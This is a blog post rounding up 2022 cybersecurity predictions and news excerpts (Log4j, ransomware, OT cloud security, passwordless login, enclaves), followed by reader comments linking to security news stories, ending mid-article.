Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
You’ve still not patched it? Hackers are using these old software flaws to deliver ransomware https://www.zdnet.com/article/youve-still-not-patched-it-hackers-are-using-these-old-software-flaws-to-deliver-ransomware/
Log4j has dominated recent discussions around cybersecurity vulnerabilities, but the emergence of the Java logging library security flaw has allowed several other major exploits being abused by cyber criminals to fly under the radar, potentially putting many organisations at risk from ransomware and other cyberattacks. But cybersecurity researchers at Digital Shadows have detailed several other vulnerabilities that appeared last year or that are even older and continue to be left unpatched and exploited which may have been missed and continue to provide opportunities for cyber criminals.
Tomi Engdahl says:
Poliisilta hyvä vinkki nettihuijausten torjumiseen yksinkertainen mutta tehokas kikka
https://www.tivi.fi/uutiset/tv/4c3953e0-b4bd-442e-a37d-b6ecbfae4a03
Poliisi tiedotti tutkinnasta, joka koski laajaa petossarjaa. Epäillyt rikokset ovat tapahtuneet internetin myyntialustalla viime syksyn aikana. Poliisin verkkosivuilla annettiin vinkki siitä, miten petoksen mahdollisuutta voi pienentää, kun on ostamassa jotakin internetissä.
Myyjää voi pyytää lähettämään kuvan, jossa on myynnissä olevan tuotteen lisäksi paperille kirjoitettu kuluvan päivän päivämäärä. Tämä vähentää pelkän netistä poimitun kuvan hyväksikäyttöä.
Tomi Engdahl says:
Senate lawmakers try again on cyber incident reporting legislation https://therecord.media/senate-lawmakers-try-again-on-cyber-incident-reporting-legislation/
The leaders of the Senate Homeland Security Committee on Tuesday introduced a legislative package meant to boost U.S. cybersecurity, warning a possible Russian invasion of Ukraine could result in cyberattacks against the U.S. by Moscow or its proxies. The proposed legislation, dubbed the Strengthening American Cybersecurity Act, combines three bills Senate Homeland Chair Gary Peters (D-Mich.) and ranking member Rob Portman (R-Ohio) advanced out of their committee, including a measure that would require critical infrastructure firms to notify the Homeland Security Department when they are breached.
Tomi Engdahl says:
Poland Launches Cybersecurity Military Unit
https://www.securityweek.com/poland-launches-cybersecurity-military-unit
Poland’s defense minister on Tuesday appointed an army general to head a new Cyber Defense Force to officially launch the unit’s operation.
Defense Minister Mariusz Blaszczak said the force’s mission includes defense, reconnaissance and, if need be, offensive actions to protect Poland’s Armed Forces from cyberattacks.
“We are perfectly aware that in the 21st century cyberattacks have become one of the tools of aggressive politics, also used by our neighbour,” Blaszczak said, apparently referring to Russia. “For that reason these capabilities are of fundamental, key nature to Poland’s Armed Forces.”
Blaszczak appointed Brig. Gen. Karol Molenda to head the unit, that will cooperate closely with the National Center for Cyber Security, initiated in 2019.
Poland’s state offices and companies occasionally fall victim to hacking.
Last year, emails were apparently leaked from the private box of Michal Dworczyk, the head of Prime Minister Mateusz Morawiecki’s office, and made available on the internet, presenting some government officials and decisions in negative light. Dworczyk denies they are authentic, but circumstances indicate at least some are.
Tomi Engdahl says:
When It Comes To Tech, China Is Just As Wary Of The U.S. As U.S. Is Wary Of China
https://www.forbes.com/sites/rashishrivastava/2022/02/08/when-it-comes-to-tech-china-is-just-as-wary-of-the-us-as-us-is-wary-of-china/?sh=2bec2a2857c3
Tomi Engdahl says:
Finanssialan varautuminen hyvällä tolalla https://www.huoltovarmuuskeskus.fi/a/finanssialan-varautuminen-hyvalla-tolalla
Suomalaiset pankit ja rahoitusalan viranomaiset suoriutuivat hyvin syksyn FATO-harjoituksesta. Harjoituksen tulosten perusteella finanssiala on parantanut varautumistaan erilaisiin uhkiin.
Kehittämistä löytyi vielä esimerkiksi yhteistoiminnassa ja viestinnässä. Pankkitoimintaan kohdistuvia uhkia ovat esimerkiksi erilaiset kyberhyökkäykset tai taloudelliset kriisit. Pankit ovat muun muassa maksuliikenteen hoidon takia keskeisiä koko yhteiskunnan toiminnan kannalta, ja niiden varautumista kriiseihin tulee alati vahvistaa.
Tomi Engdahl says:
CISA and SAP warn about major vulnerability https://therecord.media/cisa-and-sap-warn-about-major-vulnerability/
German enterprise software maker SAP and the US Cybersecurity and Infrastructure Security Agency have issued security advisories on Tuesday to warn SAP customers to install the companys February security patches as soon as possible in order to prevent the exploitation of a major vulnerability in a ubiquitous SAP component.
Tracked as CVE-2022-22536, the vulnerability was discovered by cloud security firm Onapsis and impacts the SAP Internet Communication Manager (ICM).. Also:
https://www.bleepingcomputer.com/news/security/cisa-warns-admins-to-patch-maximum-severity-sap-vulnerability/.
https://www.zdnet.com/article/sap-releases-patches-for-icmad-vulnerabilities/
Tomi Engdahl says:
2021 Trends Show Increased Globalized Threat of Ransomware https://www.cisa.gov/uscert/ncas/alerts/aa22-040a
In 2021, cybersecurity authorities in the United States, Australia, and the United Kingdom observed an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organizations globally. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) observed incidents involving ransomware against 14 of the 16 U.S. critical infrastructure sectors, including the Defense Industrial Base, Emergency Services, Food and Agriculture, Government Facilities, and Information Technology Sectors.. Ransomware tactics and techniques continued to evolve in 2021, which demonstrates ransomware threat actors growing technological sophistication and an increased ransomware threat to organizations globally.
Tomi Engdahl says:
Nettikiristäjille maksetaan usein yli 500 000 dollaria näin iso osuus suuryrityksistä maksaa lunnaat
https://www.tivi.fi/uutiset/tv/9deb1939-81cb-4f6a-95b7-ff086b54f2a2
Kriittisen infrastruktuurin tietoturvan kanssa suuryrityksissä työskentelevistä osaajista 80 prosenttia vastasi tuoreessa kyselyssä, että ovat törmänneet töissä kiristyshaittaohjelmaan, Venture Beat uutisoi. 60 prosenttia kertoi, että lunnaita oli myös maksettu ja että puolessa tapauksista summa oli yli 500 000 dollaria. Suunnilleen 80 prosenttia myös kertoi, että yrityksensä kyberturvapuolen budjettia on nostettu sitten vuoden 2020.. Turvallisuuspuolta vaivaa osaajapula, sillä 90 prosenttia palkkaisi heti lisää väkeä varmistamaan toiminnan jatkuvuutta.
Tomi Engdahl says:
Cybersecurity threats are always changingstaying on top of them is vital, getting ahead of them is paramount https://www.microsoft.com/security/blog/2022/02/09/cybersecurity-threats-are-always-changing-staying-on-top-of-them-is-vital-getting-ahead-of-them-is-paramount/
With a 1,070 percent increase in ransomware attacks year-over-year between July 2020 and June 2021, staying on top of attack trendssuch as ransomware and supply chain threatsis more important than ever.1 To successfully detect and defend against security threats, we need to come together as a community and share our expertise, research, intelligence, and insights. Microsoft Security Insider is a site for business leaders focused on cybersecurity to get the latest news, insights, threat intelligence, and perspectives on top-of-mind topics in cybersecurit.
Tomi Engdahl says:
Spam and phishing in 2021
https://securelist.com/spam-and-phishing-in-2021/105713/
The subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their investment projects look as alluring as possible.
Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors.. Thats how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later.
Tomi Engdahl says:
How to Detect and Defend Against Domain Abuse https://www.recordedfuture.com/how-to-detect-and-defend-against-domain-abuse/
Picture this: A threat actor acquires a stolen list of your customers email addresses via a dark web forum. The actor then registers a typosquat domain, similar to your own. They use your logos and design to make the site look as authentic as possible. Then, they email this phishing site directly to your customers, and trick them into giving up their credit card information. Your customers are justifiably angry. They blame you for their lost money, time, and expenses related to identity monitoring. Even though its not your fault, youve lost their trust, and gaining it back will be both difficult and expensive.
Tomi Engdahl says:
Criminals Increasing SIM Swap Schemes to Steal Millions of Dollars from US Public
https://www.ic3.gov/Media/Y2022/PSA220208
The Federal Bureau of Investigation is issuing this announcement to inform mobile carriers and the public of the increasing use of Subscriber Identity Module (SIM) swapping by criminals to steal money from fiat and virtual currency accounts. From January 2018 to December 2020, the FBI Internet Crime Complaint Center (IC3) received 320 complaints related to SIM swapping incidents with adjusted losses of approximately $12 million. In 2021, IC3 received 1,611 SIM swapping complaints with adjusted losses of more than $68 million.. Also:
https://www.bleepingcomputer.com/news/security/fbi-warns-of-criminals-escalating-sim-swap-attacks-to-steal-millions/.
https://therecord.media/fbi-68-million-lost-to-sim-swapping-attacks-in-2021/.
https://www.zdnet.com/article/fbi-warns-sim-swapping-attacks-are-rocketing-dont-brag-about-your-crypto-online/
Tomi Engdahl says:
Wave of MageCart attacks target hundreds of outdated Magento sites https://www.bleepingcomputer.com/news/security/wave-of-magecart-attacks-target-hundreds-of-outdated-magento-sites/
Analysts have found the source of a mass breach of over 500 e-commerce stores running the Magento 1 platform and involves a single domain loading a credit card skimmer on all of them. According to Sansec, the attack became evident late last month when their crawler discovered
374 infections on the same day, all using the same malware. The domain from where threat actors loaded the malware is naturalfreshmall[.]com, currently offline, and the goal of the threat actors was to steal the credit card information of customers on the targeted online stores.
Tomi Engdahl says:
ESET Threat Report T3 2021
https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/
While 2020 was the year of supply-chain attacks (and, yes, the start of the global COVID-19 crisis), 2021 was defined by shockingly severe vulnerabilities (and by vaccines). The year started with a bang, when Microsoft Exchange servers around the world found themselves under fire from at least ten APT groups. ProxyLogon, the vulnerability chain at the bottom of these attacks, ended up being the second most frequent external attack vector in 2021 according to ESET telemetry, right after password-guessing attacks. As youll read in the ESET Threat Report T3 2021, Microsoft Exchange servers ended up under siege again in August 2021, with ProxyLogons younger sibling, named ProxyShell, exploited worldwide by several threat groups.
Tomi Engdahl says:
Example of Cobalt Strike from Emotet infection https://isc.sans.edu/forums/diary/Example+of+Cobalt+Strike+from+Emotet+infection/28318/
Since early December 2021, we have seen reports of Emotet infections dropping Cobalt Strike malware (link). I’ve seen it occasionally since then, and I reported an example last week. Today’s diary reviews another Cobalt Strike sample dropped by an Emotet infection on Tuesday 2022-02-08. This was an infection from the epoch 5 botnet, and approximately 5 hours after the initial infection, Cobalt Strike traffic started on 2022-02-08 at 19:54 UTC. The Cobalt Strike binary was sent over HTTPS Emotet C2 traffic, so there were no indicators over the network for Cobalt Strike until the Cobalt Strike traffic started.
Tomi Engdahl says:
Windows explorer has an option to remove properties from media files:
Remove Properties and Personal Information. For example, removing Exif data from JPEG files https://blog.didierstevens.com/2022/02/08/windows-explorer-improper-exif-data-removal/
There is an issue with this feature: it does not properly remove Exif data.
Tomi Engdahl says:
LolZarus: Lazarus Group Incorporating Lolbins into Campaigns https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns
Qualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors.
Tomi Engdahl says:
Decryptor released for Maze, Egregor, and Sekhmet ransomware strains https://www.zdnet.com/article/decryptor-for-maze-egregor-and-sekhmet-ransomware-strains-released/
A decryptor has been released for the Maze, Sekhmet and Egregor ransomwares after someone published the master decryption keys in a BleepingComputer forum post. Around 6:30 yesterday evening, someone identifying themselves as “Topleak” said “It was decided to release keys to the public for Egregor, Maze, Sekhmet ransomware families.”.
“Each archive with keys have corresponding keys inside the numeric folders which equal to advert id in the config. In the “OLD” folder of maze leak is keys for it’s old version with e-mail based. Consider to make decryptor first for this one, because there were too many regular PC users for this version,” the user wrote.. Also:
https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/
Tomi Engdahl says:
Dragos ICS/OT Ransomware Analysis: Q4 2021 https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/
A common misconception suggests ransomware is solely a threat to information technology (IT); however, data from 2021 indicates ransomware is having an increasing impact on operational technology
(OT) as well. Dragos analyzed data from 37 ransomware strains on Dark Web resources leveraged to post victims, leak files, and conduct negotiations. Appearance on a Dark Web resource does not confirm that ransomware actors successfully compromised a firm, the extent of access achieved by the ransomware actors, or whether a firm made the ransomware payment.
Tomi Engdahl says:
Data Highlights Growing Threat From Intelligent Bots Operated at Scale by Cybercriminals
https://www.securityweek.com/data-highlights-growing-threat-intelligent-bots-operated-scale-cybercriminals
The intelligent bot revolution continues. Eighty-six percent of attacks against accounts are now driven by bots that have become 3 times more complex than those seen in earlier years – making it harder for security teams to detect bot signatures.
Details have been released in the 2022 State of Fraud and Account Security (PDF) published by Arkose Labs. Figures come from an analysis of actual user sessions and attack patterns seen on the Arkose Labs Fraud and Abuse Prevention Platform in 2021. This means that the figures cannot be applied to the entire market, but relate to those companies that have a sufficient fraud problem to seek protection from Arkose.
That said, the report is a stark indication of the growing threat from intelligent bots operated at scale by cybercriminals. Statistics show that 1 in 4 new account registrations are fake; 80% of login attacks are credential stuffing; there’s a 16% increase in mobile attack traffic; and 5 in 6 industries have seen an increase in attacks.
The report also shows how responsive the attackers are to user engagement. As user engagement increases, so do attacks. The gaming industry suffered what Arkose calls ‘unprecedented’ attacks in 2020 – probably due to an increase in gaming during the pandemic-induced lockdowns. As the lockdowns eased in 2021 and the gaming industry implemented new controls, gaming attacks declined 2x faster than user engagement.
Tomi Engdahl says:
FBI Received 1,600 SIM Swapping Complaints in 2021
https://www.securityweek.com/fbi-received-1600-sim-swapping-complaints-2021
The Federal Bureau of Investigation (FBI) this week announced that between 2018 and 2021 its Internet Crime Complaint Center (IC3) received more than 1,900 complaints related to SIM swapping.
SIM swapping is a form of fraud scheme in which threat actors employ various phishing and social engineering techniques to trick support personnel at mobile carriers into transferring a victim’s phone number to a SIM card in the attacker’s possession.
In some cases, the attackers may conduct the SIM swapping scheme with the help of an insider, or they may trick the wireless carrier employees into downloading malware that will later be used to hack the carrier’s systems to perform SIM swapping.
Once in the possession of the victim’s phone number, the threat actors receive all of their calls and texts, including two-factor authentication codes, which allows them to change the passwords associated with the victim’s email accounts and take them over.
This allows the attackers to gain access to the victim’s online and bank accounts and perform various other fraudulent operations, such as the theft of sensitive information, crypto assets, or funds from the victim’s bank account.
Tomi Engdahl says:
Protecting Cryptocurrencies and NFTs – What’s Old is New
https://www.securityweek.com/protecting-cryptocurrencies-and-nfts-whats-old-new
Five steps that end-users can take to protect themselves against cryptocurrency losses
There has been quite a bit of chatter around cryptocurrencies and non-fungible tokens (NFTs) of late. As with most topics these days, some of that chatter has been around the topic of security. Specifically, there seems to be quite a bit of interest around how attackers and fraudsters can compromise cryptocurrencies and NFTs. In particular, one topic of keen interest is how attackers and fraudsters can profit from illicit or fraudulent activities around cryptocurrencies. I would like to take a look at that along with the security of cryptocurrencies in this piece.
I should preface all of this by noting the obvious – I am no expert in cryptocurrencies. That being said, when I look at threats to cryptocurrencies, I see a case of what’s old is new again. What do I mean by that? While there is always the possibility that a cryptocurrency itself will be compromised, that is not likely to be where we will see the vast majority of fraud loss and theft. Why is that? Attackers and fraudsters are opportunistic and coin-operated. If they can easily make money targeting weaker links than the cryptocurrencies themselves, they will do so.
Given this, what are some steps that end-users can take to protect themselves against cryptocurrency losses? While not an exhaustive list, here are five steps end-users can take to protect themselves:
